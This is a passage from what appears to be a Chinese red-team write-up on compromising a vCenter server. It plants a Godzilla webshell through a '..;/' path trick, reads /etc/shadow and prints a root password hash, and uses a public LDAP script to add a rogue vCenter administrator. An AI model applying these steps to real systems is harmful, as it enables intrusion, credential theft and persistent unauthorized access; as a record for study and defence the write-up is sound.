<p blockindex=13>再次备份木马到隐藏目录下，访问路径为<a href=https://xn--ip-214cy05o/idm/..;/update.jsp>https://内网IP/idm/..;/update.jsp</a> 重新用哥斯拉连接之，这样就成功获取root权限的webshell<br>
<img src="data:image/png;base64,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
<p blockindex=14>查看/etc/shadow获取root密码密文内容</p>
<pre blockindex=15><code class="hljs language-php">root:$<span class=hljs-number>6</span>$QL15TDCu$<span class=hljs-number>8</span>HetMyfCTNW6LDS5XKb0yvY7SZqxa55PExH9SKb1pjnzSr/<span class=hljs-number>4</span>yVBkOQLAghKwWah3NuqxWIaSFJZ<span class=hljs-comment>//:0:0:365:7:::</span>
</code></pre>
<p blockindex=16>这里直接放到在线破解网站发现无法破解，只能先保存下来后面有时间可以破解之，尽管没有破解出明文也是不影响后面的攻击流程的。</p>
<h4 blockindex=17>vCenter控制台权限获取</h4>
<p blockindex=18>我们知道vCenter控制台管理了众多的ESXI虚拟机，这些都是业务系统载体，是我们攻击方非常感兴趣的点。为此我们要通过vCenter后台服务器权限来绕过SAML登录，基本思路是：</p>
<pre blockindex=19><code class="hljs language-php">vCenter SSO：
<span class=hljs-number>1</span>. 用户访问vCenter
<span class=hljs-number>2</span>. vCenter生成SAML Request，通过浏览器携带参数重定向到Idp地址
<span class=hljs-number>3</span>. 用户在Idp地址完成认证
<span class=hljs-number>4</span>. Idp生成SAML Response(包含身份断言，签名)，通过自动门提交表单将其发送
给vCenter
<span class=hljs-number>5</span>. vCenter 对 SAML Response 的内容进行检验，通过后返回session cookie
<span class=hljs-number>6</span>. 用户成功登录
</code></pre>
<p blockindex=20>为了进一步获取vCenter控制台管理权限，下面利用三好学生脚本vCenterLDAP_Manage.py按照步骤：获取域控信息-&gt;添加新用户admin-&gt;将新用户加入管理员组中</p>
<p blockindex=21>可以在github上下载三好学生的利用脚本<br>
<a href=https://github.com/3gstudent/Homework-of-Python/blob/master/vCenterLDAP_Manage.py>https://github.com/3gstudent/Homework-of-Python/blob/master/vCenterLDAP_Manage.py</a></p>
<p blockindex=22>获取域控信息<br>
<img src="data:image/png;base64,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
<p blockindex=23>添加新用户admin<br>
<img src=data:image/png;base64,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
<p blockindex=24>将新用户加入管理员组中<br>
<img src="data:image/png;base64,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